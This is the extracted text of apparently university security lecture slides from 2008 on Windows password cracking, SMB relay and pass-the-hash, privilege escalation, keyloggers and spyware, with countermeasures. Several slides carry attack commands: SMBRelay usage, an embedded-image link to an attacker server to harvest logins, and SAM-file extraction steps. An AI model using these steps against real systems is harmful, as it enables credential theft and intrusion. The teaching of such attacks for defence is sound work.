The document discusses various techniques for hacking systems, including cracking passwords, escalating privileges, and covering tracks. It describes password cracking methods like brute force attacks, dictionary attacks, and sniffing passwords on a network. It also covers tools for cracking passwords stored in Windows systems and escalating privileges by exploiting vulnerabilities. Finally, it provides recommendations for password security and mitigating risks from hacking attempts.
9. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 9/83
Passive Online Attack: Man-in-the-
Middle and Replay Attacks
Somehow get access to the communicationschannel
Wait until the authentication sequence
Proxy authentication-traffic
No need to brute force
11. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 11/83
Offline Attacks
Offline attacks are time consuming
LM Hashes are much more vulnerable due to smaller
key space and shorter length
Web services are available
Distributed password cracking techniques are available
Mitigations:
Use good passwords
Remove LM Hashes
Attacker has password database
Password representations must be cryptographically
secure
Considerations:
Moore’s law
35. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 35/83
Password Sniffing
Password guessing is a tough task
Why not just sniff credentials off the wire as users log
in to a server and then replay them to gain access?
If an attacker is able to eavesdrop on NT/2000 logins,
then this approach can spare lot of random guesswork
36. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 36/83
How to Sniff SMB Credentials
38. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 38/83
Hacking Tool: NBTDeputy
NBTDeputy register a NetBIOS computer name on the network
and is ready to respond to NetBT name-query requests.
NBTdeputy helps to resolve IP address from NetBIOS computer
name. It's similar to Proxy ARP.
This tool works well with SMBRelay.
For example, SMBRelay runs on a computer as ANONYMOUS-
ONE and the IP address is 192.168.1.10 and NBTDeputy is also
ran and 192.168.1.10 is specified. SMBRelay may connect to
any XP or .NET server when the logon users access "My
Network Places"
40. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 40/83
Hacking Tool: SMBRelay
Hacking Tool: SMBRelay
SMBRelay is essentially a SMB server that can capture
usernames and password hashes from incoming SMB
traffic.
It can also perform man-in-the-middle (MITM) attacks.
You must disable NetBIOS over TCP/IP and block
ports 139 and 445.
Start the SMBRelay server and listen for SMB packets:
c:>smbrelay /e
c:>smbrelay /IL 2 /IR 2
An attacker can access the client machine by simply
connecting to it via relay address using: c:> net use
* <capture _ip>c$
41. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 41/83
SMB Replay Attacks
Trick client computer to request a connection
Request connection to the client computer and collect
challenge
Return challenge from client computer as own
challenge
Wait for response from client computer
Return response as own response
Best way of fighting SMB replay attack is by enabling
SMB signing in security policy
44. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 44/83
Redirecting SMB Logon to the Attacker
Eavesdropping on LM
responses becomes
much easier if the
attacker can trick the
victim to attempt
Windows authentication
of the attacker's choice
The basic trick is to
send an email message
to the victim with an
embedded hyperlink to
a fraudulent SMB server
When the hyperlink is
clicked, the user
unwittingly sends his
credentials over the
network img src=file://attacker_server/null.gif height=1 width=1.
45. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 45/83
Replay Attack Tool: SMBProxy
A “Passing the Hash” tool that works as a proxy
You can authenticate to a Windows NT4/2000 server
by knowing only the md4 hash
You can mount shares and access the registry and
anything a particular user can do with his privileges
It does not work with syskey enabled systems
46.
47. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 47/83
Tool: LCP
Main purpose of the LCP program is user account passwords
auditing and recovery in Windows NT/2000/XP/2003
Features:
Account information imports:
Import from local computer
Import from remote computer
Import from SAM file
Import from .LC file
Import from .LCS file
Import from PwDump file
Import from Sniff file
Passwords recovery:
Dictionary attack
Hybrid of dictionary and brute force attacks
Brute force attack
50. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 50/83
Tool: Access PassView
Access PassView tool reveals the database password of
every passwordprotected mdb file that was created with
Microsoft Access 95/97/2000/XP
It can be useful if you have forgotten the Access Database
password and you want to recover it
There are two ways of getting the password of the mdb
file:
Drag & Drop
Command-line
Limitations:
In Access 2000/XP files, this utility cannot recover
passwords that contain morethan 18 characters
This utility shows only the main database password. It
cannot recover the user-level passwords
52. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 52/83
Password Recovery Tool: MS Access
Database Password Decoder
The ‘MS Access Database Password Decoder’ utility
was designed to decrypt the master password stored
in a Microsoft Access database
53. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 53/83
Tool: Asterisk Logger
Asterisk Logger reveals passwords that are stored behind
the asterisks
Features:
Displays additional information about the revealed password
such as the date/time on which password was revealed, the
name of the application that contains the revealed password
box, and the executable file of the application
Allows you to save the passwords to HTML file
54. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 54/83
Tool: Asterisk Key
Asterisk Key shows passwords hidden under
asterisks
Features:
Uncovers hidden passwords on password dialog boxes
and web pages
State-of-the-art password recovery engine: All
passwords are recovered instantly
Supports multilingual passwords
Full install/uninstall support
56. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 56/83
Password Cracking Countermeasures
Enforce 8-12 character alphanumeric passwords
Set the password change policy to 30 days
Physically isolate and protect the server
Use SYSKEY utility to store hashes on disk
Monitor the server logs for brute force attacks on user
accounts
57. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 57/83
Do Not Store LAN Manager Hash in SAM Database
Instead of storing your user account password in
cleartext, Windows generates and stores user account
passwords by using two different password "hashes"
When you set or change the password for a user
account to a password that contains fewer than 15
characters, Windows generate both LAN Manager
hash (LM hash) and Windows NT hash (NT hash) of
the password
These hashes are stored in the local Security Accounts
Manager (SAM) database or in Active Directory
The LM hash is relatively weak compared to the NT
hash and so it is prone to fast brute-force attack.
Therefore, you may want to prevent Windows from
storing an LM hash of your password
58. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 58/83
LM Hash Backward Compatibility
Windows 2000-based servers and Windows Server
2003-based servers can authenticate users who
connect with computers that are running the earlier
versions of Windows
Windows 95/98 clients do not use Kerberos for
authentication
For backward compatibility, Windows 2000 and
Windows Server 2003 support:
LAN Manager (LM) authentication
Windows NT (NTLM) authentication
NTLM version 2 (NTLMv2) authentication
59. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 59/83
LM Hash Backward Compatibility
The NTLM, NTLMv2, and Kerberos all use the NT
hash, also known as the Unicode hash
The LM authentication protocol uses the “LM hash”
It is best to prevent storage of the LM hash if you do
not need it for backward compatibility. If your network
contains Windows 95, Windows 98, or Macintosh
clients, you may experience the following problems if
you prevent the storage of LM hashes
60. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 60/83
How to Disable LM HASH
63. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 63/83
Cracking NT/2000 Passwords
SAM file in Windows NT/2000 contains the user names
and encrypted passwords. The SAM file is located at
%systemroot%system32config directory
The file is locked when the OS is running
Booting to an alternate OS
NTFSDOS (www.sysInternals.com) will mount any NTFS
partition as a logical drive
Backup SAM from the Repair directory
Whenever rdisk /s is run, a compressed copy of the
SAM called SAM._ is created in %systemroot%repair
Expand this file using c:>expand sam._sam
Extract the hashes from the SAM
Use LOphtcrack to hash the passwords
68. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 68/83
Privilege Escalation Tool: x.exe
This tool, when
executed on
remote
systems,
creates a user
called “X” with
a password of
“X” and adds
the user to the
administrator’s
group
70. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 70/83
Tool: psexec
Lets you execute processes on other systems remotely
Launches interactive command prompts on remote systems
73. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 73/83
Emsa FlexInfo Pro
Emsa FlexInfo Pro is a system information and
diagnostics tool that allows you to access a system
details and settings
It includes a real-time CPU and memory graph, as well
as CPU speed test and memory test tools
It includes several useful networking utilities
(Bandwidth Monitor, Ping, Whois etc.) as well as an
atomic time synchronizer, a browser popup blocker,
and a basic keylogger
75. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 75/83
Keystroke Loggers
If all other attempts to sniff out domain privileges fail,
then a keystroke logger is the solution
Keystroke loggers are stealth software packages that
are placed between keyboard hardware and the
operating system, so that they can record every
keystroke
There are two types of keystroke loggers
Software-based
Hardware-based
76. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 76/83
Revealer Keylogger
Revealer Keylogger tool records keyboard inputs
Revealer Keylogger's powerful log engine logs any
language on any keyboard and perfectly handles
dead-keys
Features:
Powerful log engine
Full invisible mode
Password protection
Send log files via e-mail
78. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 78/83
Hacking Tool: Hardware Key Logger
Hacking Tool: Hardware Key Logger
The Hardware Key Logger
is a tiny hardware device
that can be attached in
between a keyboard and
a computer.
It keeps a record of all
key strokes typed on the
keyboard. The recording
process is totally
transparent to the end
user.
80. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 80/83
What is Spyware?
Spyware is a program that records computer activities
on a machine
Records keystrokes
Records email messages
Records IM chat sessions
Records websites visited
Records applications opened
Captures screenshots
81. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 81/83
Spyware: Spector
Spector is spyware that records everything that one
does on the Internet
Spector automatically takes hundreds of snapshots
every hour, like a surveillance camera
Spector works by taking a snapshot of whatever is on
the computer screen and saves it away in a hidden
location on the system’s hard drive
82. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 82/83
Keylogger Countermeasures
Install Antivirus software and keep the signatures up
to date
Install a Host-based IDS such as Cisco CSA agent
which can monitor your system and disable the
installation of keyloggers
Keep your hardware systems secure in a locked
environment
Frequently check the keyboard cables for attached
connectors
83. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 83/83
Anti-Keylogger
This tool can detect keylogger installations and
remove them